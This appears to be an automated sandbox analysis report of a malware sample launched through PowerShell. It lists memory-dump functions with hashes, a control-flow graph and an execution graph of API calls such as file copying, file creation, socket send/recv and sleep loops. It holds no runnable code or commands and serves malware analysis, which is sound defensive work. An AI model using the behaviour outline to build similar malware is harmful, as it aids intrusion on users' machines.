                                                                                                                                                                                                                                  Function 074509F8 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 758 74509f8-7450a14 759 7450a44-7450a4b 758->759 760 7450a16-7450a1f 758->760 761 7450a21-7450a26 760->761 762 7450a4c-7450a68 760->762 764 7450a3e-7450a43 761->764 765 7450a28-7450a2e 761->765 769 7450ac1-7450ad0 762->769 770 7450a6a-7450a82 762->770 764->759 766 7450a30 765->766 767 7450a32-7450a3c 765->767 766->764 767->764 774 7450b42-7450b76 769->774 776 7450ad2-7450af4 769->776 770->774 775 7450a88-7450a99 770->775 788 7450b8e-7450b9b 774->788 789 7450b78-7450b7e 774->789 781 7450ab3-7450abc 775->781 782 7450a9b-7450aa1 775->782 784 7450af6-7450afc 776->784 785 7450b0e-7450b26 776->785 781->769 786 7450aa5-7450ab1 782->786 787 7450aa3 782->787 790 7450b00-7450b0c 784->790 791 7450afe 784->791 798 7450b34-7450b3f 785->798 799 7450b28-7450b2a 785->799 786->781 787->781 792 7450b80 789->792 793 7450b82-7450b8c 789->793 790->785 791->785 792->788 793->788 799->798
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 84i
                                                                                                                                                                                                                                  • API String ID: 0-676453231
                                                                                                                                                                                                                                  • Opcode ID: 64310d98ab55985a022a2eae891ec2e511152489b3cda579e2195987e3a7637b
                                                                                                                                                                                                                                  • Instruction ID: b599f3a8c5901d4e06ab21b3db5db0f0debc8ea9d32f13487a0f84632deb8b75
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64310d98ab55985a022a2eae891ec2e511152489b3cda579e2195987e3a7637b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F141D2B46093819FC7259BA48850BEBBBB1EF46314F19809BD848DF2A3D731DC46C7A1
                                                                                                                                                                                                                                  Function 074527C8 Relevance: .6, Instructions: 603COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4a5364f0172af67eeef09587e966caf22f4d249f5452fab5545372f395ba4903
                                                                                                                                                                                                                                  • Instruction ID: 6f0515355ac442694f4a858b7197b0728af3ae5a2e04139d3da9fd6913b822f5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a5364f0172af67eeef09587e966caf22f4d249f5452fab5545372f395ba4903
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE1215F170031A9FDB289F68D4407EBBBA2FF85210F14846BD8168B352DBB1C945C7A1
                                                                                                                                                                                                                                  Function 07451C90 Relevance: .4, Instructions: 357COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2695c5ccd90b8256f54e9d84c73d33b1fa2558439910da4d21961aa0dd947b4c
                                                                                                                                                                                                                                  • Instruction ID: 738a7b70321263733d74140ea3022971e5fe1b9a9d068ce7e9210537919d8dca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2695c5ccd90b8256f54e9d84c73d33b1fa2558439910da4d21961aa0dd947b4c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6B138B1704349DFDB259B69C4007EBBBA2AF82611F2484ABDD46CB353DB31C941C7A1
                                                                                                                                                                                                                                  Function 07450458 Relevance: .3, Instructions: 307COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: cf914556c442b59b0cf5c1dfd7f7bea838a75ef034fbc5b6f79676f85524eca0
                                                                                                                                                                                                                                  • Instruction ID: 644bbd495d0aad36a09784bfd678de705f0433816f7437990db5b9a4ce09909c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf914556c442b59b0cf5c1dfd7f7bea838a75ef034fbc5b6f79676f85524eca0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4A1E5B9B042058FDB25DA79D4106EBBBE1AFC1311F2484ABD855CB362EB31C941C791
                                                                                                                                                                                                                                  Function 07452120 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 18c5f87cac8d1bef9a31c9af3462d2832397d76f819eaa9ebc7a899fbbc34164
                                                                                                                                                                                                                                  • Instruction ID: 6afa86757f8397d0a85111fa5ec09e2b7b4dc6772a6a4cadca455e6e57228daf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18c5f87cac8d1bef9a31c9af3462d2832397d76f819eaa9ebc7a899fbbc34164
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78517FB4A00204CBDB04DB58C554BDE77F2FF89714F64806AE8056F355DBB2DD818BA1
                                                                                                                                                                                                                                  Function 07452106 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fce3728b145d74f598cd357ff1662c682356f774e8ce44f603705ed5441a99f6
                                                                                                                                                                                                                                  • Instruction ID: 81689bfc40a7bf4b5a55a906d710904b0a55a12af52c7fc4427f9acf6bb0b388
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fce3728b145d74f598cd357ff1662c682356f774e8ce44f603705ed5441a99f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED514BB4A002049FDB04CB54C554BDEBBF2FF89714F6580AAE9056F356C6B2ED81CB61
                                                                                                                                                                                                                                  Function 0745043A Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 76ed1aab53a5c37f0a2676d92f28b29dd7b72aef89aeaf368e09654c1165daf9
                                                                                                                                                                                                                                  • Instruction ID: a1ff40f0337c2c8eb726d27a20dcc8b3b2ae140402f3ca1772ddab6df7eba982
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76ed1aab53a5c37f0a2676d92f28b29dd7b72aef89aeaf368e09654c1165daf9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE31F3F861430A9FDB21DA3485107EBB7A49B82360F1585A7DC049B3A3E735CA81C7A1
                                                                                                                                                                                                                                  Function 07451C72 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c6d5bbf46a183b6f551f0409a297d932536e95b9c951bc43aa3f39a2dca3f582
                                                                                                                                                                                                                                  • Instruction ID: 6ddab819f451dad702a7391be0a4cf29976f370841513e8470d67e81357d3165
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6d5bbf46a183b6f551f0409a297d932536e95b9c951bc43aa3f39a2dca3f582
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F83103B560434EDFCB298E15C5407E6BBB1EF42221F2981A7DC158B253D335D98ACBA1
                                                                                                                                                                                                                                  Function 07450678 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5463e9cf53678adcc6dc178dda217cae8ce7c121bc0ed7d958be7680ad17f426
                                                                                                                                                                                                                                  • Instruction ID: f508678d5911c9d41628fe52424635de0028ce51fb4eb1c4228381a1298a00c8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5463e9cf53678adcc6dc178dda217cae8ce7c121bc0ed7d958be7680ad17f426
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3119DB8B0020A9FCB64DE79C4407FABBE5AF84310F148567D81887362E774C981CF91
                                                                                                                                                                                                                                  Function 046DD005 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1869871875.00000000046DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 046DD000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_46dd000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1d608b6b363f53694f784900229aec2cce1e419b9cb6cce6021ae1348059af91
                                                                                                                                                                                                                                  • Instruction ID: 2018eb7f962ce6c90252b5edd86b6322259823f121a5e737782e83e63230ca3d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d608b6b363f53694f784900229aec2cce1e419b9cb6cce6021ae1348059af91
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4201807140D3C4AFD7129F259D84752BFA4DF93224F0985DBE8888F293D2695C45CB72
                                                                                                                                                                                                                                  Function 046DD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1869871875.00000000046DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 046DD000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_46dd000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 39a77b0cd2e9304234edaa0652a9122df1a761427d0740d62285e006b994f152
                                                                                                                                                                                                                                  • Instruction ID: 8e4e19f5a7a1e3c45ef3f7c161788159d2812955702173aabd8662aa25fff54a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39a77b0cd2e9304234edaa0652a9122df1a761427d0740d62285e006b994f152
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D01F771904344ABE7106F65EC84B67BB98EFD1760F08C419DD080A242E279A846CAB2

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:5.6%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:46.9%
                                                                                                                                                                                                                                  Signature Coverage:5.4%
                                                                                                                                                                                                                                  Total number of Nodes:1983
                                                                                                                                                                                                                                  Total number of Limit Nodes:82
                                                                                                                                                                                                                                  execution_graph 67966 10001f42 68012 10004330 67966->68012 67968 10001f51 CreateDirectoryW 68027 10004d80 67968->68027 67971 10004d80 28 API calls 67972 10001f91 CopyFileW 67971->67972 67974 10001fc0 67972->67974 67975 10001fb6 67972->67975 67977 10001ff0 67974->67977 67978 10004160 28 API calls 67974->67978 68084 10004160 67975->68084 68033 10003a70 67977->68033 67978->67977 67980 10002023 68050 100067d0 67980->68050 67982 100024f0 68100 100038d0 28 API calls 67982->68100 67984 1000250b 67985 10002523 67984->67985 67987 10004160 28 API calls 67984->67987 67988 10002552 67985->67988 67991 10004160 28 API calls 67985->67991 67986 10002590 68102 1000a5c6 28 API calls 2 library calls 67986->68102 67987->67985 67992 10002578 67988->67992 67993 10004160 28 API calls 67988->67993 67990 10004e80 28 API calls 67995 1000202b 67990->67995 67991->67988 67993->67992 67994 1000259a 67995->67982 67995->67986 67995->67990 67996 10004d80 28 API calls 67995->67996 67997 100021d5 CreateDirectoryW CreateDirectoryW 67995->67997 67998 10004160 28 API calls 67995->67998 68000 10004cc0 28 API calls 67995->68000 68001 100022bc CopyFileW 67995->68001 68002 10002365 CopyFileW 67995->68002 68003 10004160 28 API calls 67995->68003 68008 10004160 28 API calls 67995->68008 67996->67995 67999 10004330 28 API calls 67997->67999 67998->67997 67999->67995 68000->67995 68001->67995 68002->67995 68004 10002392 68002->68004 68003->68002 68099 10006e60 41 API calls 68004->68099 68006 100023ae CreateFileW 68007 100023ea WriteFile CloseHandle 68006->68007 68009 10002405 68006->68009 68007->68009 68008->67995 68009->67995 68010 1000258b 68009->68010 68101 1000daab 26 API calls _abort 68010->68101 68013 10004386 68012->68013 68019 1000433e 68012->68019 68014 10004398 68013->68014 68015 1000443f 68013->68015 68017 100043b0 68014->68017 68018 10004449 68014->68018 68024 100043be 68014->68024 68117 1000a5a6 28 API calls 2 library calls 68015->68117 68017->68024 68116 100046f0 28 API calls 2 library calls 68017->68116 68118 1000a5a6 28 API calls 2 library calls 68018->68118 68019->68013 68023 10004365 68019->68023 68103 10004890 68023->68103 68024->67968 68026 10004380 68026->67968 68029 10004dd1 68027->68029 68028 10004890 28 API calls 68030 10004e45 68028->68030 68029->68028 68031 10004330 28 API calls 68030->68031 68032 10001f78 68031->68032 68032->67971 68034 10003a89 68033->68034 68035 10003b6c 68033->68035 68037 10003a97 68034->68037 68038 10003aca 68034->68038 68125 1000a5c6 28 API calls 2 library calls 68035->68125 68039 10003b76 68037->68039 68040 10003aa3 68037->68040 68041 10003b80 68038->68041 68042 10003ad6 68038->68042 68126 1000a5c6 28 API calls 2 library calls 68039->68126 68123 10004280 28 API calls ___BuildCatchObject 68040->68123 68127 1000a5a6 28 API calls 2 library calls 68041->68127 68048 10003ae6 68042->68048 68124 100046f0 28 API calls 2 library calls 68042->68124 68048->67980 68049 10003ac1 68049->67980 68051 10004d80 28 API calls 68050->68051 68052 1000682c PathFileExistsW 68051->68052 68053 10006897 68052->68053 68054 1000684b 68052->68054 68055 10004d80 28 API calls 68053->68055 68136 10003970 68054->68136 68057 100068a7 68055->68057 68059 100068c5 68057->68059 68062 10004160 28 API calls 68057->68062 68058 1000686e 68148 10006b40 28 API calls 68058->68148 68061 100068f8 PathFileExistsW 68059->68061 68063 10004160 28 API calls 68059->68063 68064 1000690a 68061->68064 68083 1000693c 68061->68083 68062->68059 68063->68061 68149 100034a0 68064->68149 68066 10004160 28 API calls 68066->68083 68067 10006917 68156 10006b40 28 API calls 68067->68156 68069 10004d80 28 API calls 68069->68083 68070 1000687d 68070->68066 68070->68083 68072 10004160 28 API calls 68072->68083 68073 10006a0d PathFileExistsW 68073->68083 68074 10004160 28 API calls 68074->68073 68075 10006af3 68077 10006b05 68075->68077 68078 10004160 28 API calls 68075->68078 68076 10007d50 28 API calls 68076->68083 68079 10006b2b 68077->68079 68081 10004160 28 API calls 68077->68081 68078->68077 68079->67995 68081->68079 68082 10006bc0 28 API calls 68082->68083 68083->68069 68083->68072 68083->68073 68083->68074 68083->68075 68083->68076 68083->68082 68128 10006d90 68083->68128 68157 10004a00 28 API calls ___BuildCatchObject 68083->68157 68085 100041a0 68084->68085 68087 10004170 68084->68087 68161 1000daab 26 API calls _abort 68085->68161 68087->67974 68099->68006 68100->67984 68102->67994 68104 10004979 68103->68104 68105 100048a9 68103->68105 68120 1000a5c6 28 API calls 2 library calls 68104->68120 68107 10004983 68105->68107 68108 100048c5 68105->68108 68121 1000a5a6 28 API calls 2 library calls 68107->68121 68110 1000498d 68108->68110 68111 100048dc 68108->68111 68115 100048ea 68108->68115 68122 1000a5a6 28 API calls 2 library calls 68110->68122 68111->68115 68119 100046f0 28 API calls 2 library calls 68111->68119 68115->68026 68116->68024 68119->68115 68120->68107 68123->68049 68124->68048 68125->68039 68126->68041 68129 10006db1 68128->68129 68130 10006dd6 68128->68130 68129->68130 68132 10006dbc 68129->68132 68131 10004890 28 API calls 68130->68131 68134 10006de2 68131->68134 68158 10005a30 28 API calls 2 library calls 68132->68158 68134->68083 68135 10006dc7 68135->68083 68137 100039c6 68136->68137 68142 1000397e 68136->68142 68138 100039d6 68137->68138 68139 10003a5e 68137->68139 68144 100039e6 68138->68144 68159 100046f0 28 API calls 2 library calls 68138->68159 68160 1000a5a6 28 API calls 2 library calls 68139->68160 68142->68137 68145 100039a5 68142->68145 68144->68058 68146 10003a70 28 API calls 68145->68146 68147 100039c0 68146->68147 68147->68058 68148->68070 68150 100034c1 68149->68150 68151 100034d3 68149->68151 68152 10003970 28 API calls 68150->68152 68154 10003970 28 API calls 68151->68154 68153 100034cc 68152->68153 68153->68067 68155 100034f9 68154->68155 68155->68067 68156->68070 68157->68083 68158->68135 68159->68144 68162 10002f82 68163 10002f8d 68162->68163 68169 10002fb9 68162->68169 68164 10002f97 68163->68164 68244 1000daab 26 API calls _abort 68163->68244 68166 10002fa3 68164->68166 68245 1000daab 26 API calls _abort 68164->68245 68168 10002faf 68166->68168 68246 1000daab 26 API calls _abort 68166->68246 68168->68169 68247 1000daab 26 API calls _abort 68168->68247 68171 10002ff7 68169->68171 68175 10003019 68169->68175 68248 1000daab 26 API calls _abort 68169->68248 68177 10003003 68171->68177 68249 1000daab 26 API calls _abort 68171->68249 68172 100030df 68188 1000315a 68172->68188 68195 10003138 68172->68195 68260 1000daab 26 API calls _abort 68172->68260 68176 10003057 68175->68176 68180 10003079 68175->68180 68252 1000daab 26 API calls _abort 68175->68252 68185 10003063 68176->68185 68253 1000daab 26 API calls _abort 68176->68253 68187 1000300f 68177->68187 68250 1000daab 26 API calls _abort 68177->68250 68180->68172 68181 100030bd 68180->68181 68256 1000daab 26 API calls _abort 68180->68256 68192 100030c9 68181->68192 68257 1000daab 26 API calls _abort 68181->68257 68186 1000306f 68185->68186 68254 1000daab 26 API calls _abort 68185->68254 68186->68180 68255 1000daab 26 API calls _abort 68186->68255 68187->68175 68251 1000daab 26 API calls _abort 68187->68251 68189 1000317b 68188->68189 68207 100031c0 68188->68207 68264 10003dc0 68189->68264 68193 100030d5 68192->68193 68258 1000daab 26 API calls _abort 68192->68258 68193->68172 68259 1000daab 26 API calls _abort 68193->68259 68199 10003144 68195->68199 68261 1000daab 26 API calls _abort 68195->68261 68203 10003150 68199->68203 68262 1000daab 26 API calls _abort 68199->68262 68203->68188 68263 1000daab 26 API calls _abort 68203->68263 68205 100031a2 68280 100036c0 68205->68280 68210 10003220 68207->68210 68216 100086b0 68207->68216 68209 100031ad 68211 100036c0 26 API calls 68210->68211 68212 10003241 68211->68212 68213 100036c0 26 API calls 68212->68213 68214 10003258 68213->68214 68217 100086c2 68216->68217 68218 1000870b 68216->68218 68219 10008911 68217->68219 68220 100086cd select 68217->68220 68221 100087a0 68218->68221 68223 10008774 select 68218->68223 68219->68207 68220->68207 68228 1000880b 68221->68228 68229 100097d0 28 API calls 68221->68229 68291 100097d0 68221->68291 68223->68221 68224 100087b5 recv 68224->68221 68225 100087d2 WSAGetLastError 68224->68225 68226 10008800 68225->68226 68227 100087df WSAGetLastError 68225->68227 68230 100097d0 28 API calls 68226->68230 68227->68221 68227->68226 68231 100097d0 28 API calls 68228->68231 68229->68221 68242 10008809 ___BuildCatchObject 68230->68242 68232 10008811 closesocket 68231->68232 68233 10008828 68232->68233 68295 1000fc8d 65 API calls 2 library calls 68233->68295 68234 100088bf 68234->68219 68238 10008901 closesocket 68234->68238 68236 10008850 send 68237 1000886b WSAGetLastError 68236->68237 68236->68242 68237->68234 68239 1000887a WSAGetLastError 68237->68239 68238->68219 68239->68234 68239->68242 68240 100088c1 closesocket 68241 100088d8 68240->68241 68296 1000fc8d 65 API calls 2 library calls 68241->68296 68242->68234 68242->68236 68242->68240 68265 10003e25 68264->68265 68270 10003dce 68264->68270 68266 10003eab 68265->68266 68267 10003e2e 68265->68267 68317 1000a5a6 28 API calls 2 library calls 68266->68317 68272 10003e3e 68267->68272 68300 10004460 68267->68300 68270->68265 68273 10003df4 68270->68273 68272->68205 68274 10003df9 68273->68274 68275 10003e0f 68273->68275 68298 10003ec0 28 API calls std::_Xinvalid_argument 68274->68298 68299 10003ec0 28 API calls std::_Xinvalid_argument 68275->68299 68278 10003e1f 68278->68205 68279 10003e09 68279->68205 68281 100036cb 68280->68281 68282 100036ed 68280->68282 68281->68282 68283 100036da 68281->68283 68342 1000daab 26 API calls _abort 68281->68342 68282->68209 68285 100036e1 68283->68285 68343 1000daab 26 API calls _abort 68283->68343 68286 100036e8 68285->68286 68344 1000daab 26 API calls _abort 68285->68344 68286->68282 68345 1000daab 26 API calls _abort 68286->68345 68292 100097e7 68291->68292 68294 100097f5 ___scrt_fastfail 68291->68294 68292->68294 68297 10009900 28 API calls std::_Xinvalid_argument 68292->68297 68294->68224 68295->68242 68296->68234 68297->68294 68298->68279 68299->68278 68301 10004493 68300->68301 68302 100044f7 68301->68302 68303 100044d7 68301->68303 68309 100044cc 68301->68309 68305 1000a5f3 new 22 API calls 68302->68305 68304 100044e3 68303->68304 68325 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 68303->68325 68318 1000a5f3 68304->68318 68305->68309 68308 10004568 68311 10004574 68308->68311 68327 1000daab 26 API calls _abort 68308->68327 68309->68308 68312 1000458a 68309->68312 68326 1000daab 26 API calls _abort 68309->68326 68314 10004580 68311->68314 68328 1000daab 26 API calls _abort 68311->68328 68312->68272 68314->68312 68329 1000daab 26 API calls _abort 68314->68329 68322 1000a5f8 68318->68322 68320 1000a624 68320->68309 68322->68320 68330 1000dafb 68322->68330 68337 10014867 7 API calls 2 library calls 68322->68337 68338 1000ae00 RaiseException __CxxThrowException@8 new 68322->68338 68339 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 68322->68339 68336 10015a9f ___FrameUnwindToState 68330->68336 68331 10015add 68341 100160ec 20 API calls __dosmaperr 68331->68341 68332 10015ac8 RtlAllocateHeap 68334 10015adb 68332->68334 68332->68336 68334->68322 68336->68331 68336->68332 68340 10014867 7 API calls 2 library calls 68336->68340 68337->68322 68340->68336 68341->68334 68346 1000aa85 68347 1000aa90 68346->68347 68348 1000aac3 dllmain_crt_process_detach 68346->68348 68349 1000aab5 dllmain_crt_process_attach 68347->68349 68350 1000aa95 68347->68350 68355 1000aa9f 68348->68355 68349->68355 68351 1000aa9a 68350->68351 68352 1000aaab 68350->68352 68351->68355 68356 1000a6f7 27 API calls 68351->68356 68357 1000a6d8 29 API calls 68352->68357 68356->68355 68357->68355 68358 1000ac67 68359 1000ac73 ___FrameUnwindToState 68358->68359 68360 1000ac9c dllmain_raw 68359->68360 68361 1000ac97 68359->68361 68363 1000ac82 ___FrameUnwindToState 68359->68363 68362 1000acb6 dllmain_crt_dispatch 68360->68362 68360->68363 68371 10006e40 68361->68371 68362->68361 68362->68363 68366 1000ad03 68366->68363 68367 1000ad0c dllmain_crt_dispatch 68366->68367 68367->68363 68369 1000ad1f dllmain_raw 68367->68369 68368 10006e40 12 API calls 68370 1000acef dllmain_crt_dispatch dllmain_raw 68368->68370 68369->68363 68370->68366 68372 10006e49 68371->68372 68373 10006e4e 68371->68373 68375 10007240 12 API calls 68372->68375 68373->68366 68373->68368 68376 100072d7 68375->68376 68376->68373 68377 100012cb 68378 10004160 28 API calls 68377->68378 68379 100012d5 68378->68379 68535 10005f20 68379->68535 68382 10001315 68383 10001354 68382->68383 68385 10004160 28 API calls 68382->68385 68546 10006020 68383->68546 68384 10004160 28 API calls 68384->68382 68385->68383 68388 10001380 68389 100013bf 68388->68389 68391 10004160 28 API calls 68388->68391 68557 10006120 68389->68557 68390 10004160 28 API calls 68390->68388 68391->68389 68394 100013e8 68395 10001421 68394->68395 68396 10004160 28 API calls 68394->68396 68568 10005c00 68395->68568 68396->68395 68398 10004160 28 API calls 68398->68394 68400 10003a70 28 API calls 68401 10001471 68400->68401 68402 100067d0 31 API calls 68401->68402 68403 1000147c 68402->68403 68404 10003a70 28 API calls 68403->68404 68405 100014be 68404->68405 68406 100067d0 31 API calls 68405->68406 68407 100014c9 68406->68407 68408 10003a70 28 API calls 68407->68408 68409 1000150b 68408->68409 68410 100067d0 31 API calls 68409->68410 68411 10001516 68410->68411 68603 10007a40 CreateFileW 68411->68603 68413 10001539 68414 10003a70 28 API calls 68413->68414 68415 10001577 68414->68415 68416 10003a70 28 API calls 68415->68416 68437 100015bc 68416->68437 68419 100017ea 68421 1000180b Sleep 68419->68421 68441 10001815 68419->68441 68653 10007e20 68419->68653 68420 10003a70 28 API calls 68420->68437 68421->68419 68421->68441 68424 10004160 28 API calls 68424->68437 68425 10004c10 28 API calls 68425->68437 68427 10007e20 9 API calls 68428 10001adb 68427->68428 68428->68427 68431 10001b05 68428->68431 68432 10001afb Sleep 68428->68432 68430 10003a70 28 API calls 68430->68441 68434 10003a70 28 API calls 68431->68434 68432->68428 68432->68431 68435 10001b46 68434->68435 68438 10003a70 28 API calls 68435->68438 68436 100025a0 43 API calls 68436->68441 68437->68419 68437->68420 68437->68424 68437->68425 68437->68441 68612 10006220 68437->68612 68631 100025a0 68437->68631 68689 10003ff0 28 API calls std::_Xinvalid_argument 68437->68689 68442 10001b8b 68438->68442 68439 10004160 28 API calls 68439->68441 68440 10004c10 28 API calls 68440->68441 68441->68428 68441->68430 68441->68436 68441->68439 68441->68440 68665 100063b0 68441->68665 68690 1000daab 26 API calls _abort 68441->68690 68691 1000a5c6 28 API calls 2 library calls 68441->68691 68692 10003ff0 28 API calls std::_Xinvalid_argument 68441->68692 68444 10001c5c 68442->68444 68469 10001bb1 68442->68469 68676 10007de0 68444->68676 68453 10001c9c 68700 10004be0 28 API calls 68453->68700 68454 100025a0 43 API calls 68454->68469 68456 10001cb5 68701 10004be0 28 API calls 68456->68701 68459 10001cd0 68702 10004be0 28 API calls 68459->68702 68460 100036c0 26 API calls 